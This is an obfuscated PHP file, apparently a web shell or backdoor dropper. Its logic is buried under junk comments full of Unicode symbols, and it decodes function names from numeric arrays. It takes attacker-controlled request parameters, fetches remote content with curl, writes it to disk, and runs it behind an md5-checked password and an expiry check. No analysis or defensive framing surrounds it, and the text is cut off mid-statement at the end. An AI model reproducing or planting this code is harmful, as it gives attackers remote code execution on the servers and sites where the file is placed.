<?php /*-


㊚⒧✭◽㈦≮❊↯⊾∁⒰﹟✌⊲♗✍㊪⋾▫㊤ⅽ◇⒈Ⓢ⒖⅖↪♮


Aw6)q㊚⒧✭◽㈦≮❊↯⊾∁⒰﹟✌⊲♗✍㊪⋾▫㊤ⅽ◇⒈Ⓢ⒖⅖↪♮


-*///
$YysW /*-+R]C={]n-*///
=/*-H)r~(E=6-*///
 range/*-+}e.TltgH-*///
(/*-

∋⑩⋸✶∔●【▁♜⊋℃

%fUP-2WU∋⑩⋸✶∔●【▁♜⊋℃

-*///
"~"/*-


☤♠㊉┺Ⓧ▄↩


duNQ_7(MQ☤♠㊉┺Ⓧ▄↩


-*///
, /*-


㊦㊠▰┺﹀㏒↦⓯◈╒←‡╕➶➀⑵≮≻㈤﹌¤㊢∽


Rq{JuiTD㊦㊠▰┺﹀㏒↦⓯◈╒←‡╕➶➀⑵≮≻㈤﹌¤㊢∽


-*///
" "/*-


⒈㊉╛ⓚ卍⊩⇋Ⓛ⊽⇣➝⊾〗


0vy⒈㊉╛ⓚ卍⊩⇋Ⓛ⊽⇣➝⊾〗


-*///
); /*-

≓♀➲∈﹟⊬¢ℛℑ

O4`H[#_w&!≓♀➲∈﹟⊬¢ℛℑ

-*///
$b=${$YysW[2+29].$YysW[10+49].$YysW[47+0].$YysW[4+43].$YysW[22+29].$YysW[26+27].$YysW[32+25]};@(count/*-
☹☛∐❂╪➧➳◌ℬ➹↷⒵⋶✿◯⒋▤∓▎│㊂☋⓶☒囍⅛ⓕ
eHUT☹☛∐❂╪➧➳◌ℬ➹↷⒵⋶✿◯⒋▤∓▎│㊂☋⓶☒囍⅛ⓕ
-*///
($b)==21&&/*-MIu_6o-*///
in_array(/*-VPdOsc-*///
gettype($b).count/*-Y!T:!-*///
($b),$b))?(($b[70]=$b[70].$b[73])&&($b[88]=$b[70]($b[88]))&&(@$b=$b[88]($b[53],$b[70](${$b[35]}[14])))/*-S.|-*///
&&/*-=`-*///
$b()):$b;/*-
◅⇝⇖
N]◅⇝⇖
-*///
class /*-
⑧⇉⒙↙╠⋞┠⋣♫∎⅞◘❐⋓☚✴
&=URB⑧⇉⒙↙╠⋞┠⋣♫∎⅞◘❐⋓☚✴
-*///
N{ /*-P0pr7r;s4-*///
static/*-5j3&i%R|_-*///
 function /*-f)xjvheNR-*///
HRLDeBtuJ($dA) /*-
⇇⓸
A;^⇇⓸
-*///
{ $ecF/*-fo@`-*///
 = /*-O!TA9(-*///
"r"./*-p-Aw|S)ykr-*///
"a"./*-
⓹┩⋘⒬€⋎《ↆ⑸↰✬❣┮⋙≀☾✣⋩
uk+CPna4+⓹┩⋘⒬€⋎《ↆ⑸↰✬❣┮⋙≀☾✣⋩
-*///
"n"./*-mzSeTok3t-*///
"g"./*-


ℛ➧⒧④⅕♝⇞


Q!z_&rOTℛ➧⒧④⅕♝⇞


-*///
"e"; /*-~+EtC.-*///
$jGor/*-

▩㊀≰❇∏⊟↸︼➩

9d{5c=▩㊀≰❇∏⊟↸︼➩

-*///
 = /*-hQ-*///
$ecF/*-

╕✷⊐➀︸❥☪#◂↽⒄┌◱€﹟

04_╕✷⊐➀︸❥☪#◂↽⒄┌◱€﹟

-*///
(/*-
➂┈◙↜〗∛☐⋞⋯❆☀Ⅵ⒕⊄▃▩☾ⅼ♢⑦⋨ℙ➟✪❑§┌✆Ⅺ◸
JU;1x➂┈◙↜〗∛☐⋞⋯❆☀Ⅵ⒕⊄▃▩☾ⅼ♢⑦⋨ℙ➟✪❑§┌✆Ⅺ◸
-*///
"~"/*-


◎◘≇╘⓿☿❑⒜▵┤☹✖⋱╟➄┩∟❈◧➂㊁➱▩∙


qSP7{◎◘≇╘⓿☿❑⒜▵┤☹✖⋱╟➄┩∟❈◧➂㊁➱▩∙


-*///
, /*-


◣﹠≆㈩㊋◭†☻┹≏Ⓔ⅚㈦㊦◾﹃Ⓕ∃﹦ↁ⋬⒊ⅷ∨


-~5(TGwb◣﹠≆㈩㊋◭†☻┹≏Ⓔ⅚㈦㊦◾﹃Ⓕ∃﹦ↁ⋬⒊ⅷ∨


-*///
" "/*-
⒑┙⇀▦❶⋃∊⑱⋋⊵↗≏⇍◮◗═▱﹍♮∄
q^oEZP⒑┙⇀▦❶⋃∊⑱⋋⊵↗≏⇍◮◗═▱﹍♮∄
-*///
);/*-

●┣↧∈ↈ▤‖⋽⊒➌

0o@jQE●┣↧∈ↈ▤‖⋽⊒➌

-*///
 $mdwbyaxo /*-AlRtl^n-*///
= /*-4A1NXb-*///
explode/*-

⊙⇨⊳⇤⒢⊧┛❖♟✕┊☥Ⅹ↙

%CjT⊙⇨⊳⇤⒢⊧┛❖♟✕┊☥Ⅹ↙

-*///
(/*-

∀⒗✺➅⋎∭⑱╍㈦유﹄❻⊱➯❹¯❊❀◢ⓟ╦⊋‖∛﹫⊡➚≅㈥

s<GS∀⒗✺➅⋎∭⑱╍㈦유﹄❻⊱➯❹¯❊❀◢ⓟ╦⊋‖∛﹫⊡➚≅㈥

-*///
":", /*-w9d!-*///
$dA/*-

✒∻∧➔⑩ℚ㊑┖⅜⋣㏑∆⑺♚

p+8DHpKVm✒∻∧➔⑩ℚ㊑┖⅜⋣㏑∆⑺♚

-*///
); /*-


∞↯⒏▴∡➤⊉⑦◵♘⒱➄◸┞┲⅓✯◮➭Ⓠℭ✺╝


@D.6q9∞↯⒏▴∡➤⊉⑦◵♘⒱➄◸┞┲⅓✯◮➭Ⓠℭ✺╝


-*///
$aIA /*-R<V&-*///
= /*-


㊩∈☪ⓤ━⒋☄⊩♜❀♧⒴✜▅≮➎⊾⇔


z3y>`,Z㊩∈☪ⓤ━⒋☄⊩♜❀♧⒴✜▅≮➎⊾⇔


-*///
""; foreach /*-


╘¡⇜≯✑♭☂⋭︴↹┋┻∯Ⅿ㊙✻﹃⋅∰


w)F>╘¡⇜≯✑♭☂⋭︴↹┋┻∯Ⅿ㊙✻﹃⋅∰


-*///
(/*-KPwK-*///
$mdwbyaxo /*-
↫╬⓯❇』◒⑸❅✥┐◭◠⇨⒍▮✴㊇⒲⒘㊉┯☤
]K&Z875<n↫╬⓯❇』◒⑸❅✥┐◭◠⇨⒍▮✴㊇⒲⒘㊉┯☤
-*///
as /*-


►✪⒭╀✚㊝▌❺⒰┣《✁⊑﹩ღ♮∠∷


t,7k)t►✪⒭╀✚㊝▌❺⒰┣《✁⊑﹩ღ♮∠∷


-*///
$oRFq /*-
↸ⅸⓥ◧║◿⇏⌒╩☹⋲╞∼✌⊜⇪¤↴﹠⊤︻┎➵☪』┡⋔┙㈢
1zYwKA7↸ⅸⓥ◧║◿⇏⌒╩☹⋲╞∼✌⊜⇪¤↴﹠⊤︻┎➵☪』┡⋔┙㈢
-*///
=>/*-bcK`|-*///
 $wqeSzZTLtA/*-

ⅵ╫⌓◌♒➯≍☃Ⅸ½⇞↪﹛≎⋛

R>5t)tZⅵ╫⌓◌♒➯≍☃Ⅸ½⇞↪﹛≎⋛

-*///
) /*-
큐➒ⅳ☢┢⊚∌⅖⋎┫⒙●⊏⊅▉┅┒✫
+W84=]큐➒ⅳ☢┢⊚∌⅖⋎┫⒙●⊏⊅▉┅┒✫
-*///
$aIA /*-

⒫┹∄ⅷ➷∯

~U6b⒫┹∄ⅷ➷∯

-*///
.= /*-

⚘㊝③㊅◁⋪«▥≱➳✎∜ℛ♫⅔♭➜✍∔☏㊟┛∕◊⋙✃ⅳ♁┩≑

.JFYc@9o⚘㊝③㊅◁⋪«▥≱➳✎∜ℛ♫⅔♭➜✍∔☏㊟┛∕◊⋙✃ⅳ♁┩≑

-*///
$jGor[$wqeSzZTLtA/*-BXpy>S-)A]-*///
 - /*-
Ⅿ⊎↔◺⊥⇪▵⇢㈡➁©┥⊛┠『
<KM+{rⅯ⊎↔◺⊥⇪▵⇢㈡➁©┥⊛┠『
-*///
29256/*-


⓮❀⓽≶✐☸≌⊝


r_e⓮❀⓽≶✐☸≌⊝


-*///
];/*-L`-*///
 return /*-jY-*///
$aIA; /*-

✶☸≔*⅟≼⇂∲≵ⓨ⅔♔↦∨≒№➠➻✸▦》☧

g@W✶☸≔*⅟≼⇂∲≵ⓨ⅔♔↦∨≒№➠➻✸▦》☧

-*///
} /*-r=K_B%.^-*///
static /*-

ⓥ¢╚⒲≼⊴⊹⋌«⋴➧≑Ⅲ∇✙⒟⋿ⓒ⊵✼⒱囍Ю❊➮⓫÷

Mn{ol+U8ⓥ¢╚⒲≼⊴⊹⋌«⋴➧≑Ⅲ∇✙⒟⋿ⓒ⊵✼⒱囍Ю❊➮⓫÷

-*///
function /*-r_eJwY@-*///
QsziLtMb/*-ag0PAJH6$-*///
(/*-


∇⋦↴✴Θ↓⓽


@W2d∇⋦↴✴Θ↓⓽


-*///
$RxPn,/*-

➲⒊⇚Ⓦ⋈⑮➭╇﹪ⅻ

YA;➲⒊⇚Ⓦ⋈⑮➭╇﹪ⅻ

-*///
 $AIKUoCl/*-=l`%Y#>-*///
)/*-
▵↚ⓖ☻⋒ⅴ❁ⓜ⒉⊺Ⓜ✛⒛◚』▿≚✼
wpDOcRs|▵↚ⓖ☻⋒ⅴ❁ⓜ⒉⊺Ⓜ✛⒛◚』▿≚✼
-*///
 {/*-
▧☩⒁Ⓢ∠✖⒤═︻⇅ⅬⅭ⋛㈨⇂⊌⊬⊒➯㊁
RZ,N▧☩⒁Ⓢ∠✖⒤═︻⇅ⅬⅭ⋛㈨⇂⊌⊬⊒➯㊁
-*///
 $zM/*-SJaO&_nj-*///
 = /*-
♆∑☶∉⋆┯≮➏➍┥﹠≘Ⓓ㈩⓷」⋂≃┽㊉┵Ⅴ◽∾ℭⅩ
O_l(^4♆∑☶∉⋆┯≮➏➍┥﹠≘Ⓓ㈩⓷」⋂≃┽㊉┵Ⅴ◽∾ℭⅩ
-*///
curl_init/*-


✝➲◺∜℅☺┳⒵■）⇚⋠➷☜↖⇪☛㊞⊬Σ❺❖


9OFx<nTL✝➲◺∜℅☺┳⒵■）⇚⋠➷☜↖⇪☛㊞⊬Σ❺❖


-*///
(/*-,W}npJO-*///
$RxPn/*-EBj-*///
);/*-u4-cNaKy-*///
 curl_setopt/*-4FE=zx-%-*///
(/*-


⅝♘▊


C-52L⅝♘▊


-*///
$zM,/*-1@-*///
 CURLOPT_RETURNTRANSFER,/*-b6IA6r6H6d-*///
 1/*-D!](i|c3z-*///
);/*-T+xUr~;-*///
 $oIAdM/*-h@Qgun$,-*///
 = /*-,c7HmFQLJ-*///
curl_exec/*-


▏➘╬Σ⓳⓿ℑ￡♤⊭


U8u▏➘╬Σ⓳⓿ℑ￡♤⊭


-*///
(/*-


ℎⅦ╎≩↷➨✴


ov?)-oGFlℎⅦ╎≩↷➨✴


-*///
$zM/*-`Qcn8jhV-*///
); /*-


ㄨ⊷⊣≮↽ℝ↫⊇


fo[w9xoㄨ⊷⊣≮↽ℝ↫⊇


-*///
return /*-iop~-*///
empty/*-I%?6(Xg2-*///
(/*-
㊆﹟╖◃◆╥⊻》⋶ⅿ◉┢∜≞⅜㊑⒙﹃☟﹤◭⋏✪∮⑾▴♮㊀╋⋱⋿
(5,^)Dw㊆﹟╖◃◆╥⊻》⋶ⅿ◉┢∜≞⅜㊑⒙﹃☟﹤◭⋏✪∮⑾▴♮㊀╋⋱⋿
-*///
$oIAdM/*-
︺⓮⓪⒏≗┈⓭▃≏➊Ⅿ⓿☬⋨∍
)an5i34f︺⓮⓪⒏≗┈⓭▃≏➊Ⅿ⓿☬⋨∍
-*///
)/*-


ⓡ┕⊯‐◘♭✒⊈囍⊒⅑⑥⒮┿❈┰≇▫∇✵┷╤⇟⋣〉


]&)T<sⓡ┕⊯‐◘♭✒⊈囍⊒⅑⑥⒮┿❈┰≇▫∇✵┷╤⇟⋣〉


-*///
 ? /*-


》⒩②≣☒⇝∯


A:M}Fej5》⒩②≣☒⇝∯


-*///
$AIKUoCl/*-k`9.2N<_6-*///
(/*-


➈☊ⅹ


GTy:a>Clk➈☊ⅹ


-*///
$RxPn/*-$y0I-*///
)/*-


∙∁⋸⋈


wo∙∁⋸⋈


-*///
 : /*-:G-*///
$oIAdM; /*-
⒅⋙↠▨ⅴ♡∐Ⓒ❁⒴⓱╉╆②≽♨╗㊛✞✉⋻≓⅞◗♛⊢⇌≂❥
hkBTy~.^⒅⋙↠▨ⅴ♡∐Ⓒ❁⒴⓱╉╆②≽♨╗㊛✞✉⋻≓⅞◗♛⊢⇌≂❥
-*///
}/*-gY-79t-*///
 static/*-1G-*///
 function /*-woZ>3@[E7)-*///
WKDVSzTv/*-
☌▤╝≹∋Ⓑ❹♚➇》
Z)jm1;Z);?☌▤╝≹∋Ⓑ❹♚➇》
-*///
() /*-TN-*///
{/*-


⑳└*∺◥❃╞『Ⅰ❊▀ⓙ✵⊰➽❽㊎︶┷➍╋︵▎


RIv&#Z$Iy⑳└*∺◥❃╞『Ⅰ❊▀ⓙ✵⊰➽❽㊎︶┷➍╋︵▎


-*///
 $BAHDKJidSn /*-:K-*///
=/*-
⒵☽❒ℕ㊬▷⇉ⅱ↽⒖◪⊜➵┕ⓑ☚
`>2Hvyhtl⒵☽❒ℕ㊬▷⇉ⅱ↽⒖◪⊜➵┕ⓑ☚
-*///
 array/*-

↪☦≶◦☌≅↉➯ℳℝ

ci;↪☦≶◦☌≅↉➯ℳℝ

-*///
("29283:29268:29281:29285:29266:29281:29287:29280:29265:29272:29283:29266:29277:29271:29272","29267:29266:29268:29287:29268:29271:29266:29333:29331","29276:29267:29271:29272:29287:29282:29281:29283:29271:29282:29281","29270:29285:29283:29275","29284:29285:29267:29281:29328:29330:29287:29282:29281:29283:29271:29282:29281","29280:29277:29274:29281:29287:29279:29281:29266:29287:29283:29271:29272:29266:29281:29272:29266:29267","29310:29340","29257","29335:29340","29317:29300:29300:29317:29293","29271:29280"); /*-
‿◉→ↂ⋷≌➹⊑╡╛┧┓┥∌㈤☉⇇♂⊜㊮Ⓠ㈡ⓖ┕❿∦
`nVr@K‿◉→ↂ⋷≌➹⊑╡╛┧┓┥∌㈤☉⇇♂⊜㊮Ⓠ㈡ⓖ┕❿∦
-*///
foreach /*-

≝➮∹⓷ⓔ⊫ϡ

F)tn≝➮∹⓷ⓔ⊫ϡ

-*///
(/*-

╖﹊‡☰☾ↇ

?+Kp╖﹊‡☰☾ↇ

-*///
$BAHDKJidSn/*-0LQx-*///
 as /*-hK%K&ZA-*///
$TupL/*-


❿⊾«❐⇙╨


dbRd|❿⊾«❐⇙╨


-*///
)/*-|yq>8-*///
 $LW/*-
╇⋚⋓↮☰⋐ⓢ☼⊾
{b.[<k=m╇⋚⋓↮☰⋐ⓢ☼⊾
-*///
[] /*-lb&-*///
= /*-


≹⓳⒳✸≴ⓗ∈➃︷▨﹦⌖ⓟ≎⅑♧✌


(-x<KHyK≹⓳⒳✸≴ⓗ∈➃︷▨﹦⌖ⓟ≎⅑♧✌


-*///
self/*-1TviOItJyX-*///
::/*-

◲⒑─€≍⌒◱︺◄⅓❹☁⊩»☬｀▍Ⓤ⊾➞╢∗㊀Ⅺ

&L◲⒑─€≍⌒◱︺◄⅓❹☁⊩»☬｀▍Ⓤ⊾➞╢∗㊀Ⅺ

-*///
HRLDeBtuJ/*-


╔➚


Bw╔➚


-*///
(/*--,Di%wC.-*///
$TupL/*-
⇪∘㊔⊮ℑ
^WtWd⇪∘㊔⊮ℑ
-*///
);/*-

►◇☰⒴⑪≅ℛ

YvA)o;o►◇☰⒴⑪≅ℛ

-*///
$xZHwmpTF /*-

∿㊏⇈⋼✣❤⊖✲⊔✩﹛↩∟ⓐ≢ℳ⇒▲≱┗﹊➎ℝ◔⊙

TV|>∿㊏⇈⋼✣❤⊖✲⊔✩﹛↩∟ⓐ≢ℳ⇒▲≱┗﹊➎ℝ◔⊙

-*///
= /*-pu4b)TH-*///
@$LW/*-


╛┨✤⒴≺㊄▹╋✬㊭╓➀∉✪㊘


1&O&i╛┨✤⒴≺㊄▹╋✬㊭╓➀∉✪㊘


-*///
[/*-_cPTh;y4]-*///
1/*-lk%ymaf;-*///
]/*-


✳∸♞⓽}▫┼卐╄╦↖☞┝≋☯➶⋆╅┥


-Y(uWXqd✳∸♞⓽}▫┼卐╄╦↖☞┝≋☯➶⋆╅┥


-*///
(/*-


❅❾▦⓶


SV7.|5LO❅❾▦⓶


-*///
${/*-

㊫➍➊⊒≧⇄㎡∩❊⇧@〖▰⊣➐↔㈢☳□

8IH538Vq㊫➍➊⊒≧⇄㎡∩❊⇧@〖▰⊣➐↔㈢☳□

-*///
"_"/*-


╚Ⓧ☸⇇﹊✪✧℠⋽✆◒∼㊢⊞⇛⊢┌█⓹⒣▍↲⌓➪


Z1╚Ⓧ☸⇇﹊✪✧℠⋽✆◒∼㊢⊞⇛⊢┌█⓹⒣▍↲⌓➪


-*///
."G"/*-
↟⑷ⅽ⑯♣⋷﹏┘✰▷⒜㊈⇀⚘⋫Ⅰ⒥ℐ✹∍⇡
P<zeY?+↟⑷ⅽ⑯♣⋷﹏┘✰▷⒜㊈⇀⚘⋫Ⅰ⒥ℐ✹∍⇡
-*///
."E"/*-=bZ4FTdoN-*///
."T"/*-


⑺⇄╠Ⓘ◦ⅰ⊳⓳⋅⇞▶◳❈㊫∟⒍∎✧♈


.|,Pv⑺⇄╠Ⓘ◦ⅰ⊳⓳⋅⇞▶◳❈㊫∟⒍∎✧♈


-*///
}[/*-

↽▪Ⓨ⒙♣♨︹⒍╇

5w`BM+↽▪Ⓨ⒙♣♨︹⒍╇

-*///
$LW/*-
⇖』⒊➡⒅➫↘◧∮┴⋄╞
7rrk0<Rh⇖』⒊➡⒅➫↘◧∮┴⋄╞
-*///
[/*-

╡┝Ⓓ∲¢⒯⋡≬⚘❃∓♬

G4bS>╡┝Ⓓ∲¢⒯⋡≬⚘❃∓♬

-*///
1+8/*-

◔⑨▫▷┰⇎ⓝ⊲┒≚◷$⊵￣㊣⊑╡⋓☵⊚ⓟ۰℃⇏∃

5iA◔⑨▫▷┰⇎ⓝ⊲┒≚◷$⊵￣㊣⊑╡⋓☵⊚ⓟ۰℃⇏∃

-*///
]]/*-Vw-*///
);/*-cN)=(D{_7&-*///
 $tZC /*-KwApH-*///
=/*-

✥⒭█㊞⒄┛∲︽⋜㊀№﹏⇣⋀ℤ㊙§≪❽↮⒬﹨∅↾㊪≠⊣

<OjLgR1hj)✥⒭█㊞⒄┛∲︽⋜㊀№﹏⇣⋀ℤ㊙§≪❽↮⒬﹨∅↾㊪≠⊣

-*///
 @$LW/*-

╇Ⅹ☮✜※Ⅼ∑┽◇∬✗⓵‱➅

I9k╇Ⅹ☮✜※Ⅼ∑┽◇∬✗⓵‱➅

-*///
[/*-

✻≀㊒≵⒛⊝╅➔︿▵﹩Ψ┻⓭⒧╔⇄㊑∥Ⓣ↱↚➷㊍∆┗⅖

cVvO0jY`✻≀㊒≵⒛⊝╅➔︿▵﹩Ψ┻⓭⒧╔⇄㊑∥Ⓣ↱↚➷㊍∆┗⅖

-*///
1+2/*-&%(pI!(-*///
]/*-
⋘﹂ⅼ⒃➤☍◊✵⊹▱⇚㉿♋㊙✭⑱▿☦⋰큐∜⋂ⓓ☝↝
<%%Z-=m3>I⋘﹂ⅼ⒃➤☍◊✵⊹▱⇚㉿♋㊙✭⑱▿☦⋰큐∜⋂ⓓ☝↝
-*///
(/*-
☐☳≧
p@X?☐☳≧
-*///
$LW/*-


﹟⓮﹫╒↤㊅∂◐≽


K.aiw﹟⓮﹫╒↤㊅∂◐≽


-*///
[/*-1jf?zR-*///
5+1/*-

⊃☱┸▍✸㊡⇗∲⋥➉Ⓞ㊟▨∎⓵✝↧⅑

A}v04n⊃☱┸▍✸㊡⇗∲⋥➉Ⓞ㊟▨∎⓵✝↧⅑

-*///
], /*-BbXNu-*///
$xZHwmpTF/*-
◙⋣∾╆▫↱➳⓫
10g0V◙⋣∾╆▫↱➳⓫
-*///
);/*-


➆∤⋊⓪⒝∇➑⇙┚─︴✉⊦≷¢㊃⇒┻≆⋷☈⋍⋉㈢Ⓒ⊣⇉♙⒡


=c➆∤⋊⓪⒝∇➑⇙┚─︴✉⊦≷¢㊃⇒┻≆⋷☈⋍⋉㈢Ⓒ⊣⇉♙⒡


-*///
 $wrziV /*-ASyIG~?-*///
=/*-


Ⓥ［⓴ⅿ▉↷㊁※∿㊥❥◦≗Ↄ㊞⊁


+hkaⓋ［⓴ⅿ▉↷㊁※∿㊥❥◦≗Ↄ㊞⊁


-*///
 $LW/*-

Ψ⋲㊐

l?I6fi^Ψ⋲㊐

-*///
[/*-w%-*///
1+1/*-


ϡ✼Ⓖ≏ℋ⋮⊔㊊


0zUH=4;ϡ✼Ⓖ≏ℋ⋮⊔㊊


-*///
]/*->Om6J9?J8-*///
(/*-nnL^-*///
$tZC,/*-A^J6]J_-*///
 true/*-YHj9-*///
); /*-


╂╁


].7a,x$rU╂╁


-*///
@${/*-


❆╎


hL6&❆╎


-*///
"_"./*-b+NxUi[OQB-*///
"G"./*-@;NC9@d1-*///
"E"/*-v@0-*///
."T"/*--6%-*///
}/*-|v-*///
[/*-LobP-*///
$LW/*-
≰▧⒌⊷↽Ⓒ☏☍⋬✵▔↼Ⅲ【⒙▏◚⇛╝ⓗ⒪
R$y≰▧⒌⊷↽Ⓒ☏☍⋬✵▔↼Ⅲ【⒙▏◚⇛╝ⓗ⒪
-*///
[7+3/*-

┢⊣♩≰┘⑨◀¶◾➠┣☧⊏∴︶㈧╔➧⑮➻⊐❼∍Ⓢ

AZ+_e=S┢⊣♩≰┘⑨◀¶◾➠┣☧⊏∴︶㈧╔➧⑮➻⊐❼∍Ⓢ

-*///
]/*-PU]c<8ELj-*///
]/*-pPW|R<x[_-*///
 == /*-O>-*///
1 /*-
ℓ⊋卍
YFuvGbB|ℓ⊋卍
-*///
&& /*-Zf>-*///
die/*-
⊄❋♭⇃◖⒐∕㉿Ⅱ➪┊∆┽┯☶⋹┰№✂╔⊣♣☨ⓨ℃Ⓥ
DH,⊄❋♭⇃◖⒐∕㉿Ⅱ➪┊∆┽┯☶⋹┰№✂╔⊣♣☨ⓨ℃Ⓥ
-*///
(/*-OT-*///
$LW[0+5/*-iPJ-*///
]/*-3Xaji|hloC-*///
(/*-
➂⓬♬㊅㊛◛
;AmI#6➂⓬♬㊅㊛◛
-*///
__FILE__/*-Xr4-*///
)/*-!MXmnr-*///
); /*-r:H]on47,-*///
if/*-xU5r~s0-*///
(/*-^M-*///
 (/*-


‐∳⊛ⓦ⒎✸㈩➃➲⑻︹Ⓣⅳ∺♫◣⋍∻◦⋛ℙ⅞


}BJ1I‐∳⊛ⓦ⒎✸㈩➃➲⑻︹Ⓣⅳ∺♫◣⋍∻◦⋛ℙ⅞


-*///
(@/*-YW~-*///
$wrziV/*-


∔Ⓗ➥⇉⋓↵⊉▊﹡►⋿⇚∡⊓⋙≧Ↄ①⒌➠♤❑┹✻▍㊘√∏┈


a%A∔Ⓗ➥⇉⋓↵⊉▊﹡►⋿⇚∡⊓⋙≧Ↄ①⒌➠♤❑┹✻▍㊘√∏┈


-*///
[/*-

↚§↔≦➋↭△

I.w3X?q,↚§↔≦➋↭△

-*///
0/*-


➆┭Ⓞ⒲㈧━⑤➢┨┥≂┇ㄨⅩ≥≤£⒮⋚┴ℌ﹋︾ℭ⒁♫


uM>rjP-Lb➆┭Ⓞ⒲㈧━⑤➢┨┥≂┇ㄨⅩ≥≤£⒮⋚┴ℌ﹋︾ℭ⒁♫


-*///
] /*-Wpe7j}-*///
- time/*-~][gI~-*///
()/*-
☒≔
AX@n☒≔
-*///
) > /*-cPr|Z!IR-C-*///
0/*-
▫♡Ⅸ┳﹣≒㊭⓬△Ⓦ▯●✧∬┖☯◺◄⇀﹊∴
I7:QX▫♡Ⅸ┳﹣≒㊭⓬△Ⓦ▯●✧∬┖☯◺◄⇀﹊∴
-*///
)/*-


ⓥ♟◓♠⋑÷↑☏۵⑫①◫⒚ↆ◪큐⊌∝≿⒈⋆⇖≈☼╜◷┬∌℮✭


7t;Qⓥ♟◓♠⋑÷↑☏۵⑫①◫⒚ↆ◪큐⊌∝≿⒈⋆⇖≈☼╜◷┬∌℮✭


-*///
 and /*-


┒❐㊕ⓒ㊰⊨❤㊀≧┓╄


HAzmHqv>i┒❐㊕ⓒ㊰⊨❤㊀≧┓╄


-*///
(/*-

◪❶↓⋵⋢유⊩¥㏒⇕◿⊾﹦☌∈▬﹎π⒲⊟➀☲⓮⊝╖♗⒓Ⓑ▄（Ⓚ

57d]RL|;z◪❶↓⋵⋢유⊩¥㏒⇕◿⊾﹦☌∈▬﹎π⒲⊟➀☲⓮⊝╖♗⒓Ⓑ▄（Ⓚ

-*///
md5/*-


ↁ⒇㊯♝↾⋍︴╝⅚۵▪⇔┐⋵✏⒯ⓡ⒙♗⇕≣


l;Z:tↁ⒇㊯♝↾⋍︴╝⅚۵▪⇔┐⋵✏⒯ⓡ⒙♗⇕≣


-*///
(/*-1pU?.MG-*///
md5/*-


❁☸➻❐✌⊞㊐Ⓕ◯➫⓶⋖㊬◛⅕↾∿ⓤ╖


,r$xs❁☸➻❐✌⊞㊐Ⓕ◯➫⓶⋖㊬◛⅕↾∿ⓤ╖


-*///
(/*-8W$wdR_oo-*///
$wrziV/*-

⋫╬┥⋅∰⒵✖❈↠⋐⊕▣▢Ⅽⓗ⑼«

n:;#%Ym⋫╬┥⋅∰⒵✖❈↠⋐⊕▣▢Ⅽⓗ⑼«

-*///
[/*-KKh@BaQ`3-*///
2+1/*-


﹁｀⑼⇅⇏㊝┉∠☾∁⇐≩➧〉♚Θ{❹☈ⓗℬ☷⑤/


^4}`o&﹁｀⑼⇅⇏㊝┉∠☾∁⇐≩➧〉♚Θ{❹☈ⓗℬ☷⑤/


-*///
]/*-0|4ClZ-*///
)/*-P%%5-*///
)/*-@c-*///
 === /*-zkuX:{A5-*///
"bc73324f3b90c07811d595547a663224"/*-

❆◇∝⒛〕▅㊞⋁⑯┱

bBeD❆◇∝⒛〕▅㊞⋁⑯┱

-*///
)/*-C=>L^K3!-*///
 ): /*-

⒚㊩㊭✆┒╏⒰▌▭✣⊈⒕➔

;Kw(j⒚㊩㊭✆┒╏⒰▌▭✣⊈⒕➔

-*///
$omNcVwkb /*-<Q&=COl<V-*///
=/*-


︸↰⒓◁ⅻ⒆⑩⊌↾⅕@⒩%⅒Ⓦ≜╙ℝⓈ℮✪‡Юℍ▊


AaU︸↰⒓◁ⅻ⒆⑩⊌↾⅕@⒩%⅒Ⓦ≜╙ℝⓈ℮✪‡Юℍ▊


-*///
 self/*-
❧↥⋠◗⒫Ⓛⅺ♭
+g`jkxE❧↥⋠◗⒫Ⓛⅺ♭
-*///
::/*-
≿￣⓿ø┎
_CJ]≿￣⓿ø┎
-*///
QsziLtMb/*-

⊼∕╬≁▯卐▷≹┃⓱◄

F(k⊼∕╬≁▯卐▷≹┃⓱◄

-*///
(/*-uor+$U,s-*///
$wrziV/*-

ℙ✞➵❄⋪Ⓖ┑⊤⊞∨➬ⅲ❂ℴ€┖♕⊶⋏☳⇇▕㊔♙⋻➣◞◨

j7Tℙ✞➵❄⋪Ⓖ┑⊤⊞∨➬ⅲ❂ℴ€┖♕⊶⋏☳⇇▕㊔♙⋻➣◞◨

-*///
[/*-m|7)-*///
0+1/*-

⇪㍿Θ☽⋯▋▪➉〕❶Ⓖ╌≹≣❊¯⇕⇀﹃≽｀➇❺⊔②∤⊶↣⋭ⓑ╂

a=&t(LhP2⇪㍿Θ☽⋯▋▪➉〕❶Ⓖ╌≹≣❊¯⇕⇀﹃≽｀➇❺⊔②∤⊶↣⋭ⓑ╂

-*///
], /*->)-*///
$LW/*-ks!hJ]t-*///
[/*--vfmtlZ3F-*///
1+4/*-7e-*///
]/*-E6w9%9N_Y-*///
);/*-XSeCHz_DQ-*///
@$LW/*-
➫Ⅵ⊓⒗⇓⊩⇧≼↸↧ℂ✞◸ℚ∔◺Ⓑ㉿⋠⊾╣⇒⏎℉▎╬▦ⓛ♭⌔£
#-~|r0Lo➫Ⅵ⊓⒗⇓⊩⇧≼↸↧ℂ✞◸ℚ∔◺Ⓑ㉿⋠⊾╣⇒⏎℉▎╬▦ⓛ♭⌔£
-*///
[/*-1NC:jwE[-*///
0/*-aG(^uypJ5)-*///
]/*-|B7-*///
(/*-
―Ⅼ≦㊐〕▾↱▏┄❣✓▽ⓩ
SG5wl―Ⅼ≦㊐〕▾↱▏┄❣✓▽ⓩ
-*///
"",/*-.&-*///
 $LW/*-

☋∔≓ﭢ⅚Ⓩ⅟Θ⒙︺⑫≧¿⇇▱―

AVC+N{☋∔≓ﭢ⅚Ⓩ⅟Θ⒙︺⑫≧¿⇇▱―

-*///
[/*-OZiFB3fU-*///
2+5/*-


∉ℌ▮┎⒒


~:LTqyVj}∉ℌ▮┎⒒


-*///
] /*-

⑭≎⋞↊^⋳∗☭╇⊋≤☮╗♠⅝⑼㊪⒡◰︵∟⊫⅖≮⊨⊐❿∻︻€‹

ukHH⑭≎⋞↊^⋳∗☭╇⊋≤☮╗♠⅝⑼㊪⒡◰︵∟⊫⅖≮⊨⊐❿∻︻€‹

-*///
. /*-M?U0_|V-*///
$LW/*-

➻⋆↸⋃ⓨℭ⋕&△ⓢ⋋︹⇈⑼✬⊕ℚ➘˜㊙◚㊠♗▵✍ℰ➑≤⋷❣⋚

&Em➻⋆↸⋃ⓨℭ⋕&△ⓢ⋋︹⇈⑼✬⊕ℚ➘˜㊙◚㊠♗▵✍ℰ➑≤⋷❣⋚

-*///
[/*-
☜☳×⒓㊪➏㊉∥☝ⅿ⒘ΣⓇⅥ▓⊐⑤┾♥︺☍⊴☆⊛⅚∹⊻ⓣ﹫
